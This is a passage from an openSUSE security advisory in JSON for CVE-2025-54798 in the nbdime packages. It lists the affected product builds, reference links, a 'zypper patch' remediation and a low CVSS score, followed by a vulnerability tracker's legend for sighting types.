"openSUSE Tumbleweed:python313-nbdime-4.0.2-23.1.x86_64",
"openSUSE Tumbleweed:python313-nbdime-git-4.0.2-23.1.aarch64",
"openSUSE Tumbleweed:python313-nbdime-git-4.0.2-23.1.ppc64le",
"openSUSE Tumbleweed:python313-nbdime-git-4.0.2-23.1.s390x",
"openSUSE Tumbleweed:python313-nbdime-git-4.0.2-23.1.x86_64",
"openSUSE Tumbleweed:python313-nbdime-hg-4.0.2-23.1.aarch64",
"openSUSE Tumbleweed:python313-nbdime-hg-4.0.2-23.1.ppc64le",
"openSUSE Tumbleweed:python313-nbdime-hg-4.0.2-23.1.s390x",
"openSUSE Tumbleweed:python313-nbdime-hg-4.0.2-23.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-54798",
"url": "https://www.suse.com/security/cve/CVE-2025-54798"
},
{
"category": "external",
"summary": "SUSE Bug 1247787 for CVE-2025-54798",
"url": "https://bugzilla.suse.com/1247787"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"openSUSE Tumbleweed:jupyter-nbdime-7.0.2-23.1.aarch64",
"openSUSE Tumbleweed:jupyter-nbdime-7.0.2-23.1.ppc64le",
"openSUSE Tumbleweed:jupyter-nbdime-7.0.2-23.1.s390x",
"openSUSE Tumbleweed:jupyter-nbdime-7.0.2-23.1.x86_64",
"openSUSE Tumbleweed:jupyter-nbdime-jupyterlab-3.0.2-23.1.aarch64",
"openSUSE Tumbleweed:jupyter-nbdime-jupyterlab-3.0.2-23.1.ppc64le",
"openSUSE Tumbleweed:jupyter-nbdime-jupyterlab-3.0.2-23.1.s390x",
"openSUSE Tumbleweed:jupyter-nbdime-jupyterlab-3.0.2-23.1.x86_64",
"openSUSE Tumbleweed:python311-nbdime-4.0.2-23.1.aarch64",
"openSUSE Tumbleweed:python311-nbdime-4.0.2-23.1.ppc64le",
"openSUSE Tumbleweed:python311-nbdime-4.0.2-23.1.s390x",
"openSUSE Tumbleweed:python311-nbdime-4.0.2-23.1.x86_64",
"openSUSE Tumbleweed:python311-nbdime-git-4.0.2-23.1.aarch64",
"openSUSE Tumbleweed:python311-nbdime-git-4.0.2-23.1.ppc64le",
"openSUSE Tumbleweed:python311-nbdime-git-4.0.2-23.1.s390x",
"openSUSE Tumbleweed:python311-nbdime-git-4.0.2-23.1.x86_64",
"openSUSE Tumbleweed:python311-nbdime-hg-4.0.2-23.1.aarch64",
"openSUSE Tumbleweed:python311-nbdime-hg-4.0.2-23.1.ppc64le",
"openSUSE Tumbleweed:python311-nbdime-hg-4.0.2-23.1.s390x",
"openSUSE Tumbleweed:python311-nbdime-hg-4.0.2-23.1.x86_64",
"openSUSE Tumbleweed:python312-nbdime-4.0.2-23.1.aarch64",
"openSUSE Tumbleweed:python312-nbdime-4.0.2-23.1.ppc64le",
"openSUSE Tumbleweed:python312-nbdime-4.0.2-23.1.s390x",
"openSUSE Tumbleweed:python312-nbdime-4.0.2-23.1.x86_64",
"openSUSE Tumbleweed:python312-nbdime-git-4.0.2-23.1.aarch64",
"openSUSE Tumbleweed:python312-nbdime-git-4.0.2-23.1.ppc64le",
"openSUSE Tumbleweed:python312-nbdime-git-4.0.2-23.1.s390x",
"openSUSE Tumbleweed:python312-nbdime-git-4.0.2-23.1.x86_64",
"openSUSE Tumbleweed:python312-nbdime-hg-4.0.2-23.1.aarch64",
"openSUSE Tumbleweed:python312-nbdime-hg-4.0.2-23.1.ppc64le",
"openSUSE Tumbleweed:python312-nbdime-hg-4.0.2-23.1.s390x",
"openSUSE Tumbleweed:python312-nbdime-hg-4.0.2-23.1.x86_64",
"openSUSE Tumbleweed:python313-nbdime-4.0.2-23.1.aarch64",
"openSUSE Tumbleweed:python313-nbdime-4.0.2-23.1.ppc64le",
"openSUSE Tumbleweed:python313-nbdime-4.0.2-23.1.s390x",
"openSUSE Tumbleweed:python313-nbdime-4.0.2-23.1.x86_64",
"openSUSE Tumbleweed:python313-nbdime-git-4.0.2-23.1.aarch64",
"openSUSE Tumbleweed:python313-nbdime-git-4.0.2-23.1.ppc64le",
"openSUSE Tumbleweed:python313-nbdime-git-4.0.2-23.1.s390x",
"openSUSE Tumbleweed:python313-nbdime-git-4.0.2-23.1.x86_64",
"openSUSE Tumbleweed:python313-nbdime-hg-4.0.2-23.1.aarch64",
"openSUSE Tumbleweed:python313-nbdime-hg-4.0.2-23.1.ppc64le",
"openSUSE Tumbleweed:python313-nbdime-hg-4.0.2-23.1.s390x",
"openSUSE Tumbleweed:python313-nbdime-hg-4.0.2-23.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 2.5,
"baseSeverity": "LOW",
"vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:N/I:L/A:N",
"version": "3.1"
},
"products": [
"openSUSE Tumbleweed:jupyter-nbdime-7.0.2-23.1.aarch64",
"openSUSE Tumbleweed:jupyter-nbdime-7.0.2-23.1.ppc64le",
"openSUSE Tumbleweed:jupyter-nbdime-7.0.2-23.1.s390x",
"openSUSE Tumbleweed:jupyter-nbdime-7.0.2-23.1.x86_64",
"openSUSE Tumbleweed:jupyter-nbdime-jupyterlab-3.0.2-23.1.aarch64",
"openSUSE Tumbleweed:jupyter-nbdime-jupyterlab-3.0.2-23.1.ppc64le",
"openSUSE Tumbleweed:jupyter-nbdime-jupyterlab-3.0.2-23.1.s390x",
"openSUSE Tumbleweed:jupyter-nbdime-jupyterlab-3.0.2-23.1.x86_64",
"openSUSE Tumbleweed:python311-nbdime-4.0.2-23.1.aarch64",
"openSUSE Tumbleweed:python311-nbdime-4.0.2-23.1.ppc64le",
"openSUSE Tumbleweed:python311-nbdime-4.0.2-23.1.s390x",
"openSUSE Tumbleweed:python311-nbdime-4.0.2-23.1.x86_64",
"openSUSE Tumbleweed:python311-nbdime-git-4.0.2-23.1.aarch64",
"openSUSE Tumbleweed:python311-nbdime-git-4.0.2-23.1.ppc64le",
"openSUSE Tumbleweed:python311-nbdime-git-4.0.2-23.1.s390x",
"openSUSE Tumbleweed:python311-nbdime-git-4.0.2-23.1.x86_64",
"openSUSE Tumbleweed:python311-nbdime-hg-4.0.2-23.1.aarch64",
"openSUSE Tumbleweed:python311-nbdime-hg-4.0.2-23.1.ppc64le",
"openSUSE Tumbleweed:python311-nbdime-hg-4.0.2-23.1.s390x",
"openSUSE Tumbleweed:python311-nbdime-hg-4.0.2-23.1.x86_64",
"openSUSE Tumbleweed:python312-nbdime-4.0.2-23.1.aarch64",
"openSUSE Tumbleweed:python312-nbdime-4.0.2-23.1.ppc64le",
"openSUSE Tumbleweed:python312-nbdime-4.0.2-23.1.s390x",
"openSUSE Tumbleweed:python312-nbdime-4.0.2-23.1.x86_64",
"openSUSE Tumbleweed:python312-nbdime-git-4.0.2-23.1.aarch64",
"openSUSE Tumbleweed:python312-nbdime-git-4.0.2-23.1.ppc64le",
"openSUSE Tumbleweed:python312-nbdime-git-4.0.2-23.1.s390x",
"openSUSE Tumbleweed:python312-nbdime-git-4.0.2-23.1.x86_64",
"openSUSE Tumbleweed:python312-nbdime-hg-4.0.2-23.1.aarch64",
"openSUSE Tumbleweed:python312-nbdime-hg-4.0.2-23.1.ppc64le",
"openSUSE Tumbleweed:python312-nbdime-hg-4.0.2-23.1.s390x",
"openSUSE Tumbleweed:python312-nbdime-hg-4.0.2-23.1.x86_64",
"openSUSE Tumbleweed:python313-nbdime-4.0.2-23.1.aarch64",
"openSUSE Tumbleweed:python313-nbdime-4.0.2-23.1.ppc64le",
"openSUSE Tumbleweed:python313-nbdime-4.0.2-23.1.s390x",
"openSUSE Tumbleweed:python313-nbdime-4.0.2-23.1.x86_64",
"openSUSE Tumbleweed:python313-nbdime-git-4.0.2-23.1.aarch64",
"openSUSE Tumbleweed:python313-nbdime-git-4.0.2-23.1.ppc64le",
"openSUSE Tumbleweed:python313-nbdime-git-4.0.2-23.1.s390x",
"openSUSE Tumbleweed:python313-nbdime-git-4.0.2-23.1.x86_64",
"openSUSE Tumbleweed:python313-nbdime-hg-4.0.2-23.1.aarch64",
"openSUSE Tumbleweed:python313-nbdime-hg-4.0.2-23.1.ppc64le",
"openSUSE Tumbleweed:python313-nbdime-hg-4.0.2-23.1.s390x",
"openSUSE Tumbleweed:python313-nbdime-hg-4.0.2-23.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2025-08-29T00:00:00Z",
"details": "moderate"
}
],
"title": "CVE-2025-54798"
}
]
}
Loading…
Loading…
Sightings
| Author | Source | Type | Date |
|---|
Nomenclature
- Seen: The vulnerability was mentioned, discussed, or seen somewhere by the user.
- Confirmed: The vulnerability is confirmed from an analyst perspective.
- Published Proof of Concept: A public proof of concept is available for this vulnerability.
- Exploited: This vulnerability was exploited and seen by the user reporting the sighting.
- Patched: This vulnerability was successfully patched by the user reporting the sighting.
- Not exploited: This vulnerability was not exploited or seen by the user reporting the sighting.
- Not confirmed: The user expresses doubt about the veracity of the vulnerability.
- Not patched: This vulnerability was not successfully patched by the user reporting the sighting.
Loading…
Loading…